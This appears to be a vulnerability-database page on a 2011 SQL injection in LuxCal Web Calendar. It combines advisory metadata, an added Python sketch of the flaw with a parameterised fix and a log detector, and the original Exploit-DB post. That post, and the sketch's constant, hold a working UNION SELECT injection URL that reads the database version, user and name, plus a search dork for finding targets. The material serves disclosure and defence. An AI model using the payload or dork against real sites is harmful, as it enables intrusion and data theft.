Vendor: LuxCal Web Calendar
By: kaMtiEz
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: LuxCal Web Calendar
Affected Version From: 2.4.2002
Affected Version To: 2.5.2000
Patch Exists: NO
Related CWE: N/A
CPE: a:luxsoft:luxcal_web_calendar
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability

LuxCal Web Calendar versions 2.4.2 and 2.5.0 are vulnerable to SQL injection through the `id` parameter of `index.php` (the `xP=11` view). The parameter value is placed into a database query without sanitization, so a remote attacker can inject SQL with a specially crafted HTTP request and read sensitive information stored in the database.

Mitigation:

The vendor has not released a patch to address this vulnerability. As a workaround, users should ensure that the application is not exposed to untrusted users.
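As an added illustration (not part of the advisory and not LuxCal's own code), the following Python sketch reconstructs the defect class described above, an event `id` spliced into the query text, beside the parameterised fix and a log-side check for non-numeric `id` values. It assumes a toy `events` table and uses sqlite3 as a stand-in for the calendar's MySQL back end.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# The advisory's demo request (constructed copy of the URL quoted on the page).
DEMO_URL = ("http://127.0.0.1/luxcal/index.php?xP=11&id=-326415+union+all+select"
            "+1,2,@@version,user(),5,database(),7,8,9,10,11,12,13,14,15,16,17,18,"
            "19,20,21,22,23,24,25,26,27--")


def make_db():
    # Constructed stand-in for the calendar's event table; not LuxCal's schema.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (id INTEGER PRIMARY KEY, title TEXT)")
    conn.execute("INSERT INTO events VALUES (1, 'Team meeting'), (2, 'Release day')")
    return conn


def lookup_event_vulnerable(conn, raw_id):
    # The defect class the advisory describes: the request's id value becomes
    # part of the SQL text, so a UNION in the value becomes part of the query.
    # Hypothetical reconstruction, not LuxCal's code.
    sql = "SELECT id, title FROM events WHERE id = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_event_safe(conn, raw_id):
    # Fix: an event id is a plain integer, so reject anything else and bind the
    # value as a parameter; the engine then never parses attacker text as SQL.
    if not re.fullmatch(r"\d+", raw_id):
        raise ValueError("id must be a positive integer")
    sql = "SELECT id, title FROM events WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def is_sqli_probe(url):
    # Detection for access logs: any id parameter that is not purely numeric
    # (union keywords, quotes, comment markers) is a probe against this view.
    params = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return any(not re.fullmatch(r"\d+", v) for v in params.get("id", []))


if __name__ == "__main__":
    db = make_db()
    print(lookup_event_vulnerable(db, "-1 UNION ALL SELECT 1, sqlite_version()"))
    print(lookup_event_safe(db, "1"))
    print(is_sqli_probe(DEMO_URL))
```

Run against a real access log, `is_sqli_probe` applied per request line flags the demo URL above while letting ordinary `id=42` requests through.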

Exploit-DB raw data:

#############################################################################################################
## LuxCal Web Calendar v2.4.2 / v2.5.0 SQL Injection Vulnerability                                         ##
## Author : kaMtiEz (kamtiez@exploit-id.com)                                                               ##
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id         ##
## Date : 6 July, 2011                                                                                     ##
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.luxsoft.eu
[+] Download : http://www.luxsoft.eu/index.php?pge=dload
[+] version : 2.4.2 - 2.5.0 or lower may also be affected
[+] Vulnerability : SQL INJECTION
[+] Dork : "CiHuY"
[+] LOCATION : INDONESIA - JOGJA

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num]

[ XpL ]

http://127.0.0.1/[kaMtiEz]/index.php?xP=11&id=[num]

[ DEMO ]

http://127.0.0.1/luxcal/index.php?xP=11&id=-326415+union+all+select+1,2,@@version,user(),5,database(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--


[ FIX ]

dunno :">


#############################################################################################################

[ Thx TO ]

[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack,Z190T
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,Caddy-Dz and all the friends I cannot name one by one :D

[ NOTE ] 

[+] Stop Dreaming , Lets Do it ! 
[+] Don't be afraid, wounds will surely heal :)

[ QUOTE ]

[+] INDONESIANCODER still r0x
[+] nothing secure ..